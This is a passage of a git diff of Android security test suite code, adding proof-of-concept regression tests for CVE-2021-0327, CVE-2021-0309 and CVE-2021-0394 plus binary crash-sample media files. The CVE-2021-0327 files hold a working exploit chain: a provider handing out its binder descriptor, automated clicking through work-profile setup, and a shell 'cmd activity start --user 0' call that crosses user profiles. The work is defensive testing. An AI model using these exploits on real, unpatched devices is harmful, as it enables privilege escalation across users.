+ <category android:name="android.intent.category.LAUNCHER"/>
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.IntroActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.OtherUserActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.TestActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0327.workprofilesetup.ProvisionedActivity">
+ <intent-filter>
+ <action android:name="android.app.action.PROVISIONING_SUCCESSFUL" />
+ <category android:name="android.intent.category.DEFAULT" />
+ </intent-filter>
+ </activity>
+
+ <receiver
+ android:name="android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN">
+ <meta-data
+ android:name="android.app.device_admin"
+ android:resource="@xml/device_admin" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+
+ <provider
+ android:name="android.security.cts.CVE_2021_0327.BadProvider"
+ android:authorities="android.security.cts.CVE_2021_0327.BadProvider"
+ android:exported="false"
+ android:grantUriPermissions="true"
+ android:process=":badprovider" />
+
</application>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml
index a7d1ede..6e0c8bc4 100644
--- a/tests/tests/security/AndroidTest.xml
+++ b/tests/tests/security/AndroidTest.xml
@@ -17,7 +17,8 @@
<option name="test-suite-tag" value="cts" />
<option name="config-descriptor:metadata" key="component" value="security" />
<option name="config-descriptor:metadata" key="parameter" value="not_multi_abi" />
- <option name="config-descriptor:metadata" key="parameter" value="instant_app" />
+ <!-- CtsDeviceInfo target API is 23; instant app requires target API >= 26. -->
+ <option name="config-descriptor:metadata" key="parameter" value="not_instant_app" />
<option name="config-descriptor:metadata" key="parameter" value="secondary_user" />
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
@@ -33,6 +34,16 @@
value="appops reset android.security.cts" />
</target_preparer>
+ <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
+ <option name="teardown-command"
+ value="pm remove-user 10" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
+ <option name="teardown-command"
+ value="pm uninstall --user 0 android.security.cts" />
+ </target_preparer>
+
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
<option name="package" value="android.security.cts" />
<option name="runtime-hint" value="1h40m18s" />
diff --git a/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl
new file mode 100644
index 0000000..e71f2c8
--- /dev/null
+++ b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl
@@ -0,0 +1,10 @@
+// IBadProvider.aidl
+package android.security.cts.CVE_2021_0327;
+
+// Declare any non-default types here with import statements
+import android.os.ParcelFileDescriptor;
+interface IBadProvider {
+ ParcelFileDescriptor takeBinder();
+
+ oneway void exit();
+}
diff --git a/tests/tests/security/jni/Android.bp b/tests/tests/security/jni/Android.bp
index b667f18..60f9348 100644
--- a/tests/tests/security/jni/Android.bp
+++ b/tests/tests/security/jni/Android.bp
@@ -20,6 +20,7 @@
"android_security_cts_NativeCodeTest.cpp",
"android_security_cts_MMapExecutableTest.cpp",
"android_security_cts_EncryptionTest.cpp",
+ "android_security_cts_cve_2021_0394.cpp",
],
shared_libs: [
"libcrypto",
diff --git a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
index 7490d1a..06e57f1 100644
--- a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
+++ b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp
@@ -22,6 +22,7 @@
extern int register_android_security_cts_SeccompTest(JNIEnv*);
extern int register_android_security_cts_MMapExecutableTest(JNIEnv* env);
extern int register_android_security_cts_EncryptionTest(JNIEnv* env);
+extern int register_android_security_cts_cve_2021_0394(JNIEnv* env);
jint JNI_OnLoad(JavaVM *vm, void *) {
JNIEnv *env = NULL;
@@ -46,5 +47,9 @@
return JNI_ERR;
}
+ if (register_android_security_cts_cve_2021_0394(env)) {
+ return JNI_ERR;
+ }
+
return JNI_VERSION_1_4;
}
diff --git a/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp
new file mode 100644
index 0000000..66b5792
--- /dev/null
+++ b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <jni.h>
+#include <string.h>
+
+static constexpr char kDefaultValue = 'x';
+static constexpr size_t kStringLength = 4096;
+
+jboolean android_security_cts_cve_2021_0394_poc(JNIEnv* env, jobject thiz) {
+ (void) thiz;
+ char array[kStringLength];
+ memset(array, kDefaultValue, kStringLength - 1);
+ array[kStringLength - 1] = 0;
+ jstring s = env->NewStringUTF(array);
+ jboolean isVulnerable = false;
+ char invalidChars[] = { '\xc0', '\xe0', '\xf0' };
+ for (int c = 0; c < sizeof(invalidChars) / sizeof(char); ++c) {
+ char invalid = invalidChars[c];
+ array[kStringLength - 2] = invalid;
+ s = env->NewStringUTF(array);
+ const char* UTFChars = env->GetStringUTFChars(s, nullptr);
+ if (UTFChars[kStringLength - 2] != '?') {
+ isVulnerable = true;
+ }
+ env->ReleaseStringUTFChars(s, UTFChars);
+ }
+ return isVulnerable;
+}
+
+static JNINativeMethod gMethods[] = { { "poc", "()Z",
+ (void*) android_security_cts_cve_2021_0394_poc }, };
+
+int register_android_security_cts_cve_2021_0394(JNIEnv* env) {
+ jclass clazz = env->FindClass("android/security/cts/CVE_2021_0394");
+ return env->RegisterNatives(clazz, gMethods,
+ sizeof(gMethods) / sizeof(JNINativeMethod));
+}
diff --git a/tests/tests/security/res/anim/translate1.xml b/tests/tests/security/res/anim/translate1.xml
new file mode 100644
index 0000000..da2ee56
--- /dev/null
+++ b/tests/tests/security/res/anim/translate1.xml
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<translate
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:fromYDelta="0%"
+ android:toYDelta="-100%"
+ android:interpolator="@android:anim/linear_interpolator"
+ android:duration="10000" />
diff --git a/tests/tests/security/res/anim/translate2.xml b/tests/tests/security/res/anim/translate2.xml
new file mode 100644
index 0000000..d4bc6d9
--- /dev/null
+++ b/tests/tests/security/res/anim/translate2.xml
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<translate
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:fromYDelta="100%"
+ android:toYDelta="0%"
+ android:interpolator="@android:anim/linear_interpolator"
+ android:duration="10000" />
diff --git a/tests/tests/security/res/raw/cve_2018_13925.ts b/tests/tests/security/res/raw/cve_2018_13925.ts
new file mode 100644
index 0000000..5365625
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2018_13925.ts
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_14013.mp4 b/tests/tests/security/res/raw/cve_2019_14013.mp4
new file mode 100644
index 0000000..2328751
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_14013.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_2107_framelen.mp4 b/tests/tests/security/res/raw/cve_2019_2107_framelen.mp4
new file mode 100644
index 0000000..b640712
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2107_framelen.mp4
@@ -0,0 +1,6 @@
+943
+243
+636
+979
+421
+266
diff --git a/tests/tests/security/res/raw/cve_2019_2107_hevc.mp4 b/tests/tests/security/res/raw/cve_2019_2107_hevc.mp4
new file mode 100644
index 0000000..a666502
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2107_hevc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_2245.ts b/tests/tests/security/res/raw/cve_2019_2245.ts
new file mode 100644
index 0000000..4952466
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2245.ts
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_11122.mkv b/tests/tests/security/res/raw/cve_2020_11122.mkv
new file mode 100644
index 0000000..f0fa08f
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11122.mkv
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_11139.flac b/tests/tests/security/res/raw/cve_2020_11139.flac
new file mode 100644
index 0000000..3700ba9
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11139.flac
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_11168.mkv b/tests/tests/security/res/raw/cve_2020_11168.mkv
new file mode 100644
index 0000000..58bf85e
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11168.mkv
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3633.mp2 b/tests/tests/security/res/raw/cve_2020_3633.mp2
new file mode 100644
index 0000000..9c68044
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3633.mp2
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3658.mp4 b/tests/tests/security/res/raw/cve_2020_3658.mp4
new file mode 100644
index 0000000..a8ae316
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3658.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3660.mp4 b/tests/tests/security/res/raw/cve_2020_3660.mp4
new file mode 100644
index 0000000..9e0c1bf
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3660.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3661.mp4 b/tests/tests/security/res/raw/cve_2020_3661.mp4
new file mode 100644
index 0000000..e822179
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3661.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3662.mp4 b/tests/tests/security/res/raw/cve_2020_3662.mp4
new file mode 100644
index 0000000..4fd269e
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3662.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3663.mp4 b/tests/tests/security/res/raw/cve_2020_3663.mp4
new file mode 100644
index 0000000..54af26c
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3663.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2020_3688.mp4 b/tests/tests/security/res/raw/cve_2020_3688.mp4
new file mode 100644
index 0000000..18ec0ad
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3688.mp4
Binary files differ
diff --git a/tests/tests/security/res/xml/device_admin.xml b/tests/tests/security/res/xml/device_admin.xml
new file mode 100644
index 0000000..5760898
--- /dev/null
+++ b/tests/tests/security/res/xml/device_admin.xml
@@ -0,0 +1,14 @@
+<?xml version ="1.0" encoding ="utf-8"?>
+<device-admin>
+ <uses-policies>
+<!-- <limit-password/>-->
+<!-- <watch-login/>-->
+<!-- <reset-password/>-->
+<!-- <force-lock/>-->
+<!-- <wipe-data/>-->
+<!-- <expire-password/>-->
+<!-- <encrypted-storage/>-->
+<!-- <disable-camera/>-->
+<!-- <disable-keyguard-features/>-->
+ </uses-policies>
+</device-admin>
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0309.java b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java
new file mode 100644
index 0000000..3f39a0e
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.AccountManager;
+import android.accounts.GrantCredentialsPermissionActivity;
+import android.accounts.IAccountAuthenticatorResponse;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.RemoteException;
+import android.platform.test.annotations.SecurityTest;
+
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0309 {
+ private final Context mContext = InstrumentationRegistry.getContext();
+ boolean isVulnerable = true;
+
+ /**
+ * b/159145361
+ */
+ @SecurityTest(minPatchLevel = "2021-01")
+ @Test
+ public void testPocCVE_2021_0309() {
+ /**
+ * Output of adb shell pm list packages --user 0 -U com.android.providers.media
+ * package:com.android.providers.media uid:10008
+ */
+ final int REQUESTED_UID = 10008;
+ Intent intent = new Intent();
+ intent.setClassName("android",
+ "android.accounts.GrantCredentialsPermissionActivity");
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_ACCOUNT,
+ new Account("abc@xyz.org", "com.my.auth"));
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_AUTH_TOKEN_TYPE,
+ AccountManager.ACCOUNT_ACCESS_TOKEN_TYPE);
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_RESPONSE,
+ new AccountAuthenticatorResponse(new IAccountAuthenticatorResponse.Stub() {
+ @Override
+ public void onResult(Bundle value) throws RemoteException {
+ }
+
+ @Override
+ public void onRequestContinued() {
+ }
+
+ @Override
+ public void onError(int errorCode, String errorMessage) throws RemoteException {
+ /**
+ * GrantCredentialsPermissionActivity's onCreate() should not execute and
+ * should return error when the requested UID does not match the process's UID
+ */
+ isVulnerable = false;
+ }
+ }));
+
+ intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_REQUESTING_UID,
+ REQUESTED_UID);
+ mContext.startActivity(intent);
+ /**
+ * Sleep for 5 seconds to ensure that the AccountAuthenticatorResponse callback gets
+ * triggered if vulnerability is fixed.
+ */
+ try {
+ Thread.sleep(5000);
+ } catch (Exception e) {
+ }
+ assertFalse(isVulnerable);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java b/tests/tests/security/src/android/security/cts/CVE_2021_0322.java
deleted file mode 100644
index 2233005..0000000
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java
+++ /dev/null
@@ -1,80 +0,0 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package android.security.cts;
-
-import static org.junit.Assert.assertTrue;
-
-import android.app.PendingIntent;
-import android.content.Context;
-import android.content.Intent;
-import android.content.pm.ProviderInfo;
-import android.net.Uri;
-import android.os.Bundle;
-
-import androidx.test.InstrumentationRegistry;
-import androidx.test.runner.AndroidJUnit4;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import android.platform.test.annotations.SecurityTest;
-
-@RunWith(AndroidJUnit4.class)
-public class CVE_2021_0322 {
-
- private static final Uri BASE_URI = Uri.parse("content://android.security.cts.local/main");
- private final Context mContext = InstrumentationRegistry.getContext();
-
- boolean isVulnerable = false;
- boolean onFinishedExecuted = false;
-
- /**
- * b/159145361
- */
- @SecurityTest(minPatchLevel = "2021-01")
- @Test
- public void testPocCVE_2021_0322() {
- CVE_2021_0322_SliceProvider serviceProvider = new CVE_2021_0322_SliceProvider();
- serviceProvider.attachInfo(mContext, new ProviderInfo());
- PendingIntent pi = serviceProvider.onCreatePermissionRequest(BASE_URI);
- PendingIntent.OnFinished onFinish = new PendingIntent.OnFinished() {
- public void onSendFinished(PendingIntent pi, Intent intent,
- int resultCode, String resultData, Bundle resultExtras) {
- String packageName = intent.getStringExtra("provider_pkg");
- if(packageName != null) {
- isVulnerable = true;
- }
- onFinishedExecuted = true;
- }
- };
- /* Execute the intent - the result is not required as the focus is */
- /* the intent which was used. Hence ignore the exceptions. */
- try {
- pi.send(0, onFinish, null);
- } catch (Exception e) {
- }
- /* Wait till the intent finishes. PendingIntent.OnFinished would be */
- /* exectuted and the details of the intent which was executed would */
- /* checked. */
- try {
- while(!onFinishedExecuted) {
- Thread.sleep(1000); //Sleep for 1 second
- }
- assertTrue(!isVulnerable);
- } catch (Exception e) {
- }
- }
-}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java
new file mode 100644
index 0000000..d0b6cad
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java
@@ -0,0 +1,76 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+import android.os.Bundle;
+import android.os.ParcelFileDescriptor;
+import android.os.Process;
+import android.os.RemoteException;
+import android.system.ErrnoException;
+import android.system.Os;
+
+import java.io.IOException;
+
+public class BadProvider extends ContentProvider {
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public Bundle call(String method, String arg, Bundle extras) {
+ if ("get_aidl".equals(method)) {
+ Bundle bundle = new Bundle();
+ bundle.putBinder("a", new IBadProvider.Stub() {
+ @Override
+ public ParcelFileDescriptor takeBinder() throws RemoteException {
+ for (int i = 0; i < 100; i++) {
+ try {
+ String name = Os.readlink("/proc/" + Process.myPid() + "/fd/" + i);
+ // Log.v("TAKEBINDER", "fd=" + i + " path=" + name);
+ if (name.startsWith("/dev/") && name.endsWith("/binder")) {
+ return ParcelFileDescriptor.fromFd(i);
+ }
+ } catch (ErrnoException | IOException e) {
+ }
+ }
+ return null;
+ }
+
+ @Override
+ public void exit() throws RemoteException {
+ System.exit(0);
+ }
+ });
+ return bundle;
+ }
+ return super.call(method, arg, extras);
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
+ return null;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ return null;
+ }
+
+ @Override
+ public Uri insert(Uri uri, ContentValues values) {
+ return null;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ return 0;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+ return 0;
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
new file mode 100644
index 0000000..56408ee
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+import android.util.Log;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.InstrumentationRegistry;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+@SecurityTest
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0327 {
+
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static final String TAG = "CVE_2021_0327";
+ public static boolean testActivityRequested;
+ public static boolean testActivityCreated;
+ public static String errorMessage = null;
+
+ private void launchActivity(Class<? extends Activity> clazz) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ /**
+ * b/175817081
+ */
+ @Test
+ @SecurityTest
+ public void testPocCVE_2021_0327() throws Exception {
+ Log.d(TAG, "test start");
+ testActivityCreated=false;
+ testActivityRequested=false;
+ launchActivity(IntroActivity.class);
+ synchronized(CVE_2021_0327.class){
+ if(!testActivityRequested) {
+ Log.d(TAG, "test is waiting for TestActivity to be requested to run");
+ CVE_2021_0327.class.wait();
+ Log.d(TAG, "got signal");
+ }
+ }
+ synchronized(CVE_2021_0327.class){
+ if(!testActivityCreated) {
+ Log.d(TAG, "test is waiting for TestActivity to run");
+ CVE_2021_0327.class.wait(10000);
+ Log.d(TAG, "got signal");
+ }
+ }
+ Log.d(TAG, "test completed. testActivityCreated=" + testActivityCreated);
+ if(errorMessage != null){
+ Log.d(TAG, "errorMessage=" + errorMessage);
+ }
+ assertTrue(errorMessage==null);
+ assertFalse(testActivityCreated);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java
new file mode 100644
index 0000000..fd2af3a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java
@@ -0,0 +1,129 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.app.AlertDialog;
+import android.app.admin.DevicePolicyManager;
+import android.content.ClipData;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Bundle;
+import android.view.View;
+import android.util.Log;
+import android.os.SystemClock;
+
+//import android.support.test.InstrumentationRegistry;
+import androidx.test.InstrumentationRegistry;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import java.io.*;
+import java.util.stream.Collectors;
+
+import android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver;
+
+public class IntroActivity extends Activity {
+
+ private static final int AR_WORK_PROFILE_SETUP = 1;
+ private static final String TAG = "CVE_2021_0327";
+
+ private void launchOtherUserActivity() {
+ Log.d(TAG,"launchOtherUserActivity()");
+ Intent intent = new Intent(this, OtherUserActivity.class);
+ intent.setClipData(new ClipData("d", new String[]{"a/b"}, new ClipData.Item(Uri.parse("content://android.security.cts.CVE_2021_0327.BadProvider"))));
+ intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
+ startActivity(intent);
+ finish();
+ }
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG,"IntroActivity.OnCreate()");
+ if (isProfileOwner()) {
+ } else if (canLaunchOtherUserActivity()) {
+ launchOtherUserActivity();
+ } else {
+ setupWorkProfile(null);
+
+ //detect buttons to click
+ boolean profileSetUp=false;
+ String button;
+ java.util.List<UiObject2> objects;
+ UiDevice mUiDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation());
+ BySelector selector = By.clickable(true);
+
+
+ while(!profileSetUp){
+ do {
+ Log.i(TAG, "waiting for clickable");
+ SystemClock.sleep(3000);
+ } while((objects = mUiDevice.findObjects(selector)).size()==0);
+ for(UiObject2 o : objects){
+ button=o.getText();
+ Log.d(TAG,"button:" + button);
+
+ if(button==null){
+ continue;
+ }
+
+ switch(button){
+ case "Delete" :
+ o.click();
+ Log.i(TAG, "clicked: Delete");
+ break;
+ case "Accept & continue" :
+ o.click();
+ Log.i(TAG, "clicked: Accept & continue");
+ break;
+ case "Next" :
+ o.click();
+ profileSetUp=true;
+ Log.i(TAG, "clicked: Next");
+ break;
+ default :
+ continue;
+ }
+ break;
+ }
+ }
+ //end while(!profileSetUp);
+ }
+ }
+
+ private boolean isProfileOwner() {
+ return getSystemService(DevicePolicyManager.class).isProfileOwnerApp(getPackageName());
+ }
+
+ private boolean canLaunchOtherUserActivity() {
+ Intent intent = new Intent("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY");
+ return (getPackageManager().resolveActivity(intent, 0) != null);
+ }
+
+ public void setupWorkProfile(View view) {
+ Log.d(TAG, "setupWorkProfile()");
+ Intent intent = new Intent(DevicePolicyManager.ACTION_PROVISION_MANAGED_PROFILE);
+ intent.putExtra(
+ DevicePolicyManager.EXTRA_PROVISIONING_DEVICE_ADMIN_COMPONENT_NAME,
+ new ComponentName(this, AdminReceiver.class)
+ );
+ startActivityForResult(intent, AR_WORK_PROFILE_SETUP);
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ Log.d(TAG, "onActivityResult()");
+ if (requestCode == AR_WORK_PROFILE_SETUP) {
+ if (resultCode == RESULT_OK) {
+ launchOtherUserActivity();
+ } else {
+ new AlertDialog.Builder(this)
+ .setMessage("Work profile setup failed")
+ .setPositiveButton("ok", null)
+ .show();
+ }
+ }
+ super.onActivityResult(requestCode, resultCode, data);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java
new file mode 100644
index 0000000..3ed38de
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java
@@ -0,0 +1,94 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.annotation.SuppressLint;
+import android.app.Activity;
+import android.app.AlertDialog;
+import android.net.Uri;
+import android.os.AsyncTask;
+import android.os.Bundle;
+import android.os.Handler;
+import android.os.IBinder;
+import android.os.ParcelFileDescriptor;
+import android.os.ResultReceiver;
+import android.view.View;
+import android.util.Log;
+import java.io.File;
+import java.io.FileDescriptor;
+import java.io.*;
+import java.util.stream.Collectors;
+import java.util.concurrent.TimeUnit;
+import android.os.SystemClock;
+
+public class OtherUserActivity extends Activity {
+
+ static ParcelFileDescriptor sTakenBinder;
+ private static final String TAG = "CVE_2021_0327";
+ String errorMessage = null;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ doMakeProviderBad(null);
+ SystemClock.sleep(5000);
+ doStuff(null);
+ }
+
+ public void doMakeProviderBad(View view) {
+ new MakeProviderBad().execute();
+ }
+
+ private class MakeProviderBad extends AsyncTask<Void, Void, Exception> {
+
+ @Override
+ protected Exception doInBackground(Void... voids) {
+ try {
+ if (sTakenBinder != null) {
+ sTakenBinder.close();
+ sTakenBinder = null;
+ }
+
+ Uri uri = getIntent().getClipData().getItemAt(0).getUri();
+ Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null);
+ IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a"));
+ sTakenBinder = iface.takeBinder();
+ if (sTakenBinder == null) {
+ throw new Exception("Failed to find binder of provider");
+ }
+ iface.exit();
+ } catch (Exception e) {
+ errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
+ }
+
+ return null;
+ }
+
+ @Override
+ protected void onPostExecute(Exception e) {
+ }
+ }
+
+ public void doStuff(View view) {
+ sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity");
+ }
+
+ @SuppressLint("PrivateApi")
+ void sendCommand(String... args) {
+ String[] command = new String[args.length + 2];
+ command[0] = "/system/bin/cmd";
+ command[1] = "activity";
+ System.arraycopy(args, 0, command, 2, args.length);
+
+ try{
+ Runtime.getRuntime().exec(command);
+ } catch(Exception e){
+ errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
+ }
+ finally{
+ synchronized(CVE_2021_0327.class){
+ CVE_2021_0327.testActivityRequested=true;
+ CVE_2021_0327.errorMessage = errorMessage;
+ CVE_2021_0327.class.notifyAll();
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java
new file mode 100644
index 0000000..d44a220
